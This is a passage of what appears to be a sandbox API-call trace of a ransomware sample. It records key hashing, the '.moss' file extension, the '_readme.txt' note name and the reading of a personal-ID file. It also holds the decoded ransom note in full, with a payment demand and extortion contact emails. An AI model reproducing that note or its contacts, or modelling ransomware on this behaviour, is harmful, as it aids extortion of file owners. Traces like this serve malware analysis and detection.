KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0164.076] CryptHashData (hHash=0xd0e060, pbData=0x369f880, dwDataLen=0x1ee, dwFlags=0x0) returned 1 [0164.076] CryptGetHashParam (in: hHash=0xd0e060, dwParam=0x2, pbData=0x0, pdwDataLen=0x18de0c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18de0c) returned 1 [0164.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e0550 [0164.076] CryptGetHashParam (in: hHash=0xd0e060, dwParam=0x2, pbData=0x35e0550, pdwDataLen=0x18de0c, dwFlags=0x0 | out: pbData=0x35e0550, pdwDataLen=0x18de0c) returned 1 [0164.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x34) returned 0x362b8a0 [0164.076] GetLastError () returned 0x0 [0164.076] lstrcatA (in: lpString1="", lpString2="D0" | out: lpString1="D0") returned="D0" [0164.076] GetLastError () returned 0x0 [0164.076] lstrcatA (in: lpString1="D0", lpString2="08" | out: lpString1="D008") returned="D008" [0164.076] GetLastError () returned 0x0 [0164.076] lstrcatA (in: lpString1="D008", lpString2="04" | out: lpString1="D00804") returned="D00804" [0164.076] GetLastError () returned 0x0 [0164.076] lstrcatA (in: lpString1="D00804", lpString2="D4" | out: lpString1="D00804D4") returned="D00804D4" [0164.076] GetLastError () returned 0x0 [0164.076] lstrcatA (in: lpString1="D00804D4", lpString2="8D" | out: lpString1="D00804D48D") returned="D00804D48D" [0164.076] GetLastError () returned 0x0 [0164.076] lstrcatA (in: lpString1="D00804D48D", lpString2="E1" | out: lpString1="D00804D48DE1") returned="D00804D48DE1" [0164.076] GetLastError () returned 0x0 [0164.076] lstrcatA (in: lpString1="D00804D48DE1", lpString2="C8" | out: lpString1="D00804D48DE1C8") returned="D00804D48DE1C8" [0164.076] GetLastError () returned 0x0 [0164.076] lstrcatA (in: lpString1="D00804D48DE1C8", lpString2="31" | out: lpString1="D00804D48DE1C831") returned="D00804D48DE1C831" [0164.076] GetLastError () returned 0x0 [0164.077] lstrcatA (in: lpString1="D00804D48DE1C831", lpString2="C3" | out: lpString1="D00804D48DE1C831C3") returned="D00804D48DE1C831C3" [0164.077] GetLastError () returned 0x0 [0164.077] lstrcatA (in: lpString1="D00804D48DE1C831C3", lpString2="FA" | out: lpString1="D00804D48DE1C831C3FA") returned="D00804D48DE1C831C3FA" [0164.077] GetLastError () returned 0x0 [0164.077] lstrcatA (in: lpString1="D00804D48DE1C831C3FA", lpString2="AD" | out: lpString1="D00804D48DE1C831C3FAAD") returned="D00804D48DE1C831C3FAAD" [0164.077] GetLastError () returned 0x0 [0164.077] lstrcatA (in: lpString1="D00804D48DE1C831C3FAAD", lpString2="27" | out: lpString1="D00804D48DE1C831C3FAAD27") returned="D00804D48DE1C831C3FAAD27" [0164.077] GetLastError () returned 0x0 [0164.077] lstrcatA (in: lpString1="D00804D48DE1C831C3FAAD27", lpString2="D9" | out: lpString1="D00804D48DE1C831C3FAAD27D9") returned="D00804D48DE1C831C3FAAD27D9" [0164.077] GetLastError () returned 0x0 [0164.077] lstrcatA (in: lpString1="D00804D48DE1C831C3FAAD27D9", lpString2="3A" | out: lpString1="D00804D48DE1C831C3FAAD27D93A") returned="D00804D48DE1C831C3FAAD27D93A" [0164.077] GetLastError () returned 0x0 [0164.077] lstrcatA (in: lpString1="D00804D48DE1C831C3FAAD27D93A", lpString2="39" | out: lpString1="D00804D48DE1C831C3FAAD27D93A39") returned="D00804D48DE1C831C3FAAD27D93A39" [0164.077] GetLastError () returned 0x0 [0164.077] lstrcatA (in: lpString1="D00804D48DE1C831C3FAAD27D93A39", lpString2="40" | out: lpString1="D00804D48DE1C831C3FAAD27D93A3940") returned="D00804D48DE1C831C3FAAD27D93A3940" [0164.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0550 | out: hHeap=0xcd0000) returned 1 [0164.077] CryptDestroyHash (hHash=0xd0e060) returned 1 [0164.077] CryptReleaseContext (hProv=0xd2e8c0, dwFlags=0x0) returned 1 [0164.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369f880 | out: hHeap=0xcd0000) returned 1 [0164.077] lstrlenA (lpString="D00804D48DE1C831C3FAAD27D93A3940") returned 32 [0164.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x3e0) returned 0x369eea0 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x5ee) returned 0x369f288 [0164.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x369f288, cbMultiByte=1518, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 495 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x5f0) returned 0x369f880 [0164.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369f288 | out: hHeap=0xcd0000) returned 1 [0164.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369eea0 | out: hHeap=0xcd0000) returned 1 [0164.078] lstrcpyA (in: lpString1=0x35f7360, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0164.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369f880 | out: hHeap=0xcd0000) returned 1 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71790 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x28) returned 0x35f9d00 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab8610 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab8878 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab8ae0 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab8d48 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab8fb0 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab9218 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab9480 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab96e8 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab9950 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab9bb8 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x816) returned 0x369eea0 [0164.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18de10, cbMultiByte=-1, lpWideCharStr=0x369eea0, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x369f6c0 [0164.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369eea0 | out: hHeap=0xcd0000) returned 1 [0164.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x28) returned 0x35f9d30 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ab9e20 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3aba088 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3aba460 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3aba6c8 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3aba930 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abab98 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abae00 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abb068 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abb2d0 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abb538 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x35fafd8 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x130) returned 0xd57fe0 [0164.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fafd8 | out: hHeap=0xcd0000) returned 1 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1d0) returned 0x35fd558 [0164.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2b7) returned 0x369e688 [0164.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd558 | out: hHeap=0xcd0000) returned 1 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x412) returned 0x369eea0 [0164.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369e688 | out: hHeap=0xcd0000) returned 1 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x61a) returned 0x3abe448 [0164.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369eea0 | out: hHeap=0xcd0000) returned 1 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x440) returned 0x369eea0 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1060) returned 0x3abea70 [0164.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x369eea0, cbMultiByte=-1, lpWideCharStr=0x3abea70, cchWideChar=2096 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned 1073 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1070) returned 0x3abfad8 [0164.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3abea70 | out: hHeap=0xcd0000) returned 1 [0164.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369eea0 | out: hHeap=0xcd0000) returned 1 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x28) returned 0x35f9d60 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abb7a0 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abba08 [0164.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abbc70 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abbed8 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abc140 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abc3a8 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abc610 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abc878 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abcae0 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abcd48 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80a) returned 0x369eea0 [0164.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18de10, cbMultiByte=-1, lpWideCharStr=0x369eea0, cchWideChar=1029 | out: lpWideCharStr=".moss") returned 6 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3abea70 [0164.080] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369eea0 | out: hHeap=0xcd0000) returned 1 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0xcfc058 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0xcf6308 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c3f8 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0xd36ab8 [0164.080] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xcf6308 | out: hHeap=0xcd0000) returned 1 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71998 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x48) returned 0x3624b80 [0164.080] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd36ab8 | out: hHeap=0xcd0000) returned 1 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f5370 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd717f8 [0164.080] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3624b80 | out: hHeap=0xcd0000) returned 1 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c4a8 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3612f00 [0164.080] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd717f8 | out: hHeap=0xcd0000) returned 1 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c500 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f5058 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xd8) returned 0xdba2a8 [0164.080] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3612f00 | out: hHeap=0xcd0000) returned 1 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0xcfbfe0 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c558 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd717f8 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x138) returned 0xd57fe0 [0164.080] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdba2a8 | out: hHeap=0xcd0000) returned 1 [0164.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f51c0 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c5b0 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c608 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f5250 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c8) returned 0x35fd558 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xcfc058 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c3f8 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71998 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f5370 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c4a8 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c500 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f5058 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xcfbfe0 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c558 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd717f8 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f51c0 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c5b0 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c608 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f5250 | out: hHeap=0xcd0000) returned 1 [0164.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd558 | out: hHeap=0xcd0000) returned 1 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x28) returned 0x35f9d90 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abcfb0 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abd218 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abd480 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abd6e8 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abd950 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abdbb8 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abde20 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3abe088 [0164.081] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ac5ff0 [0164.083] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25c) returned 0x3ac6258 [0164.083] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x35fafd8 [0164.083] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x130) returned 0xd57fe0 [0164.083] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fafd8 | out: hHeap=0xcd0000) returned 1 [0164.083] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1d0) returned 0x35fd558 [0164.083] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0164.083] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2b7) returned 0x369e688 [0164.083] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd558 | out: hHeap=0xcd0000) returned 1 [0164.083] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x412) returned 0x369eea0 [0164.083] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369e688 | out: hHeap=0xcd0000) returned 1 [0164.083] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x61a) returned 0x3abf288 [0164.083] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369eea0 | out: hHeap=0xcd0000) returned 1 [0164.083] GetUserNameW (in: lpBuffer=0x18e010, pcbBuffer=0x18de84 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18de84) returned 1 [0164.083] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x590) returned 0x369eea0 [0164.083] GetLastError () returned 0x0 [0164.085] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18db78, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4 [0164.086] GetFileType (hFile=0x5d4) returned 0x1 [0164.086] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1000) returned 0x3acc038 [0164.086] ReadFile (in: hFile=0x5d4, lpBuffer=0x3acc038, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18dbe0, lpOverlapped=0x0 | out: lpBuffer=0x3acc038*, lpNumberOfBytesRead=0x18dbe0*=0x2a, lpOverlapped=0x0) returned 1 [0164.087] GetLastError () returned 0x0 [0164.087] ReadFile (in: hFile=0x5d4, lpBuffer=0x3acc038, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18dbe0, lpOverlapped=0x0 | out: lpBuffer=0x3acc038*, lpNumberOfBytesRead=0x18dbe0*=0x0, lpOverlapped=0x0) returned 1 [0164.087] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3acc038 | out: hHeap=0xcd0000) returned 1 [0164.087] CloseHandle (hObject=0x5d4) returned 1 [0164.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd718c8 | out: hHeap=0xcd0000) returned 1 [0164.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xcf6308 | out: hHeap=0xcd0000) returned 1 [0164.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71998 | out: hHeap=0xcd0000) returned 1 [0164.092] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0164.092] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0164.092] RegisterClassExW (param_1=0x18ddf0) returned 0xc168 [0164.092] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, 